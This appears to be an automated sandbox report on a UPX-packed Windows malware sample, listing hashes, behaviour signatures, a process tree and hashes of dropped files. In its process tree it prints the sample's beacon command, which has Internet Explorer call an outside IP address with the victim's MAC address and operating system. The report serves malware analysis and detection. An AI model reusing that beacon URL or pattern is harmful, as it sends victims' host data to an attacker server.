Analysis

  • max time kernel
    121s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    22/07/2024, 00:01

General

  • Target

    61f7756b2be965f7625b8f4725ada6c2_JaffaCakes118.exe

  • Size

    143KB

  • MD5

    61f7756b2be965f7625b8f4725ada6c2

  • SHA1

    35bbd17dba1946553d44258884a1902d4d829825

  • SHA256

    a7da9c3b8b925a1d9b6e112ea0cb1c73442178ec5693fa24897577cc0cf54746

  • SHA512

    10f83bc5735a53d27b30752adc58b6bfe012f3a6c2590ac16a15d2c268b5ab6b8b8d861fe8633ad3042bac959cb699ddcffebf8726ec2f746705251b008f631e

  • SSDEEP

    3072:MgN+Ns5uUdzh5vaBAzmeu2ZN3PRp6hIAsdxn6sM0TZMl9V:ZN+quUdzh5vaBAz5NZkhIAsdxn6sM0Tc

Score
7/10
upx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
  • Modifies registry class 11 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\61f7756b2be965f7625b8f4725ada6c2_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\61f7756b2be965f7625b8f4725ada6c2_JaffaCakes118.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=46-05-cc-59-11-a3&os=Microsoft Windows XP&flag=186174bf678f0bd95d51ef3baf3f614e&user=61f7756b2be965f7625b8f4725ada6c2_JaffaCakes118
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2732
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2732 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2016

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          89fa199765a1d46c2729e61960fbd390

          SHA1

          3dad030ed7e16aa3d0b63ede0d6b03a2c9e69889

          SHA256

          22c2e427d2407ede581da0c83b198413ac42f452f003dc9bb0f0ca8f4c5322c2

          SHA512

          7c8e816523a3f0ae29fe8671951c42ebc7e5bd56430fee13cee3f69facf910fa4f1238ad44424fd3da7892fb10bb54168ac285a2d8bd9efa6097e678b96e67ef

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          189dc67fd356712bf2dd205c88ff919d

          SHA1

          dfab7825e40060a4e0a39590565546206afc2151

          SHA256

          c597d99309707e6f3d6c44ca9fac35706a8f6080accf8a36f45330ffaa46d5f5

          SHA512

          f02c890e23e5e21b8138efa35bafb932683fd4b728cfbe64fe72b07d030356196b7c686f94220ac07536ceed4d3a5105692450b79a5ab85f0eeac53909f6caad

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          e38fdf001785b0dd77481bf47b7d6ed2

          SHA1

          4afb1f5d0e124e1fb4582579d24e4e73646d4de8

          SHA256

          393ddd0c963760487efbad328752d7b0ba03516c6cb29c25fa49e572b862b727

          SHA512

          992ee6fc22272153f3dff9758996640aaac93a0e769c211cfe282fb0ce1335338c60bf203698391dcf2999dd0b0a13a25fbdbf7c13febeda7c7eb278e4dc531e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          0d9895b3905c5748889c208a3af4bd71

          SHA1

          88c8d2e6b6f9c14a2a923f0f3c62585b2418119d

          SHA256

          accf224a7e283103429c32e624263743449c09e722334fa4beadd2d43435a993

          SHA512

          e6afa12593d35fd2389cec50a7bceb8101d54d42e6fb1e827d22844efc52a399f55c9e239db1bf98081401b3ae8cc991942d0c2527e1a961d8e92abc3d86abe3

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          8a040375158c76e21317ad31eb3bff6f

          SHA1

          98a2666b88c42f489faddf0fa60f711d6243e91e

          SHA256

          b5dc23c267f3fd64d7bbc09531798fe7143e8aec81d40a42596e62d0d78566f5

          SHA512

          0ea4a21fa4c5c735bc7e4b8f611bf5dda4b315c6dc54b3f6d8877a6837cbfe1e6c4ef77985b65952d17214cf4092dcce7ff1b57f6ebfd537e6dd325bffd208c6

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          00a4672f8d264f45cfaf72624f860b5b

          SHA1

          cf7996f56f7d00338c110aa319b6cb6327ab2330

          SHA256

          c3dc9a7605fe43a138cd5dec971862661792e302c90944774fe84be52670f806

          SHA512

          4dfe5055e48985590dee43fcdef89ba2e22ad3c109e7097690111aa6d247797aebf29f943351d91b48cdc0049beef854eb9f5047523db5c7786b8253c0617392

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          2b15b7d238624922c157402b70d922c3

          SHA1

          a3f59dafb50c00898bf7a285da56cbc0fe64fb44

          SHA256

          7910246e36333e115c8dcd181dc7ba27a66e875ecc9816e3c6ef68f29debe7c6

          SHA512

          ad7355c1376189d3717778b0b0ed18b5e3a5edbb1b3b82f2bc9bed3e5f94ccdd201f559badbac5c1e4002bac3a4afe7ea768603ba3325797e74d588332c95e85

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          caf6d761735e282e9c73018cf01001dc

          SHA1

          d4befdc71e7759186606b1779876abe80e0d798a

          SHA256

          238fd5bbdafeeb5d58128d8e0183a0f1b5a458e27ca36a3009ae419157d00b24

          SHA512

          1e100367f947c4b0c434279ae21ee08aff8ca58bac4fe7a9fcd0ad73d97faf5bd80a90124cc57ed04d3fa4234ba17ba39cf048e8328511e9a7af68915e1d4027

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          5c8e7f67c7d749bffb56a4582660811b

          SHA1

          a6f7bbf36af9a4941af02afde3c0d73d9e959207

          SHA256

          3e5aa431088791097bd25501388f5da328fefa5d9c1b3ce93d8f136f29f166ec

          SHA512

          d7b8720e3e19ff1704f656cdc8fd45e3e9ce27d66244fe1b2665df7c1d82e60fc2f2bcdf07d3123bde4a14fca0ed61059cee2da2b4cc67630c51509269d75ab6

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          06f80258b3699b0a8128168add65bfcd

          SHA1

          03aa9f3a06e01289d40cc5d56c30efd3fdf4bb8f

          SHA256

          b248a7387540d5f3e8896c70874c92c2602563113ca6b0429bac2fcd8170d337

          SHA512

          078d7d63315cfe197fddb2493ea69624ba71d62456026b9f0014c2237c8f9d243243978c6b44c1ee9f4a56eee2afff1ea89cde2b288aeb63516690710072a414

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          d39591da491b735a98e63023d21c94de

          SHA1

          ee71571f8809311a9bca2e1b0e54c830c8ea03de

          SHA256

          6604ccf4b936442dad340997771303fc846e5e2808f9cdda3932e4a42a6ec050

          SHA512

          b7238590ebefe10947bd3a433ab06da78c0abced1af3c15d22a38c01ef758668cf4441764b0d71b52a0840d7ac9cec02d69d24572bab3cc2a93d1009f7f128c4

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          87fb25a15f6f87bd1612744f28e1813b

          SHA1

          b1287a3a23fba85b2a588c9489cfbea48a9ec85c

          SHA256

          331afec921ed3b9d33811b5d2080424ca72bd47de4b8557c1860622782665130

          SHA512

          48274f6b0dc015ac89261870052601115d25e590c09b3181aaf730bee111c9587e98aa300f976ac8b73413a2aaeed68918032cfb0f7a271fe5327db9501c0bc0

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          b115d996405e0fa483748940e2052801

          SHA1

          d46a74c031b8003fac2c41c6327581045c7a8269

          SHA256

          25bf5e0664f079d9451fdf0762b87abac9d2be758d645da27b8ff3abbef065e1

          SHA512

          73141df59d5ae743a16431591736e3b1d377e2afd367d409f1ef739f1ef895a4ec5685d1c9c111de0c8ea5e9605ddc972b7a20b90625b67b397239b6af3140e3

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          94d77a3f8bfa4d929c95997b5eb1a83e

          SHA1

          9a0dcb2b1d0888788eee4f51bb61c0ea69cf88ea

          SHA256

          865c93088677c318d70b410db15ed442c4aa0a1dd85a82eaa500da9e1a48e506

          SHA512

          4416bebafc005caa1793079d12304a93a453eaa2d42be39e42ab5c2e4898f34614bdf959fbc2d0801163665c3443d7fddf5a3df13c305391ded3f224888f6986

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          71b0ac92698acbb5661323ccff0e10ae

          SHA1

          f73ea6d7a661bb168c65aae8c6ac8daaa65d4283

          SHA256

          77b5ca15aeb6811adaaf0657a31b94312ec25e1c663182d9143aa07872f6c000

          SHA512

          47e515a346dc20491a9778ff6e10edf127153452eaec973908ebaa3f7c5664443d9a73b61af02b249a22850e0af3444347acd477bbb0dfbca25f7985d8bd0184

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          671481881dae8a802f52d043f3c614f0

          SHA1

          40683564562de36dafede25d9a80c88e665f90ea

          SHA256

          7c4e28fde44015083c4f9ea65b666ac15bff171b1344616bc1fa425b2695514e

          SHA512

          c2dc455e9cad8c03bebe8d51a8073d77d4fef446ff581e5b3027f2e5ce1fc72c17cbe4e23f3ad0d6dfb2031d1a9cf0b73a2a85cf4e8356f0f44a450f06955eed

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          613231481e3f00ad890f07921dec2038

          SHA1

          2e43ebd3da101d4a6f954fd4a0fee64f36a6b184

          SHA256

          7904e7eaaf3f7b85ca8fef25154565ea5dbf634a4f8723f311874b92b3383149

          SHA512

          1d38a4c3b42052dcdabe5659659ca9611b38ff9c3280b3421143f613aa7636085f08b9dbf4db9d1f6d51c49cbd9529af3ac534a2da94ad7d9102320caa557e7a

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          854d038c33b748abd0431d702adcf94e

          SHA1

          d47b4c31dea048f3784dafff3aa16aa8a475bed6

          SHA256

          1c1aef9d9e59d0ed71e563ef1e1a0f79d32050d231ce7bae578586d947b41503

          SHA512

          301f4e0b2a239308edb42180e307f80c94ef83f19a1b67840c0c04da24824d439af0f4be64901193e63638a11e97d7723a7693c0ad456e16c501b175d0c5e840

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          4a8afda1e8df248b89bec3acb0f3dd79

          SHA1

          6c6144673b159951184b5fdaaf50c3e25c90b21d

          SHA256

          16acb072d937a9565da3006d7ee4aeede50f99afff8d2fe00163907286ce2885

          SHA512

          b6b009b35152e655a4c0be4d889cb945931a55c449a264bd02fa9f6c1e27be7d57137b66a422462b631c7a674ffcd6a4104c58e701978979e003d2bf8c5300f3

        • C:\Users\Admin\AppData\Local\Temp\Cab3F44.tmp

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\Local\Temp\Tar3FF3.tmp

          Filesize

          181KB

          MD5

          4ea6026cf93ec6338144661bf1202cd1

          SHA1

          a1dec9044f750ad887935a01430bf49322fbdcb7

          SHA256

          8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

          SHA512

          6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.fon

          Filesize

          3KB

          MD5

          ca0294359fd9a7a27616a18c22dbd68a

          SHA1

          12aa0ef1265d0bfe5b3dd60f8aa8b71708f34104

          SHA256

          af5fc76f77e480486e0592397a6a3d22fa750eef1d20e4d5fe54937879096286

          SHA512

          8b5e93b96e3ef5da76db8f0b3bc841151fe868e71ba37cb17a3b4aea7945118983b18988e53d8b498c9a539ad982e1e9b41b5c4117d223246bc44119a8475621

        • C:\b.txt

          Filesize

          261B

          MD5

          0d4670b01f65bc72dbf1af3b36ef4f2d

          SHA1

          97553344d494e9b52990d3e1de18db8d1bbc8744

          SHA256

          306a437106117981a9b66c57946da8388998cda83870657b63b0858e8ae12d39

          SHA512

          217d351fa2416443f180efc75ee6306da701a5feae1ad779bbb57682e314b7a310ad0db27f2e0815c936713bbe816086a3d1bbdc9d48cc08afc8d33f0b5702b6

        • C:\b.txt

          Filesize

          271B

          MD5

          e5c8bb1ba6bc6de3d4ddac2f0bf47e7d

          SHA1

          70900371edfcdcb01b063e731e56d129369c64a8

          SHA256

          334812944df9a9938b114b7ec02177c4bdb6cbb8dd362ea43d119a37feb2062f

          SHA512

          c3635728cb6e5327276220b57bab8c6068b50130250f8151c06134f17e143067feb04e2f47cecf6fca0d6c046325012492c67d3837ea3e57a516e0b7c4408769

        • C:\b.txt

          Filesize

          264B

          MD5

          878778e6ae273c74668c90ff5fc48431

          SHA1

          b85a0b7416e86c8f485be4b6c349f0ab426bc5b3

          SHA256

          119d16ac01b447b28a850c44efe9ef52f38ca8b1f9702404451fa7bfa85264c2

          SHA512

          936ae49cac20a0ec4ad87a06f4d55f629341c8713768f52ccc111a95272c7feae5614d897d2df6077b203d1d5c150b6375d1fefc9d8383daf104996501269c09

        • C:\b.txt

          Filesize

          264B

          MD5

          ee765b1ebea1c25ae9e7f3ce73841c46

          SHA1

          9a729deb3d211e8bbb0198bb5e7f436056293331

          SHA256

          2013251dc3e77710d417cc8c51fdcaa3d9e4ec7c019c55020994130639f87f65

          SHA512

          5cf9a564be444151dcc8cf960aee916bbd7c21874e98a0a594d2e40e5861bdbf2cac37d8da7c30b564529600c948feefd8eda45a0bd5e55e5d5b75fe9ac84434

        • memory/2096-0-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB

        • memory/2096-75-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB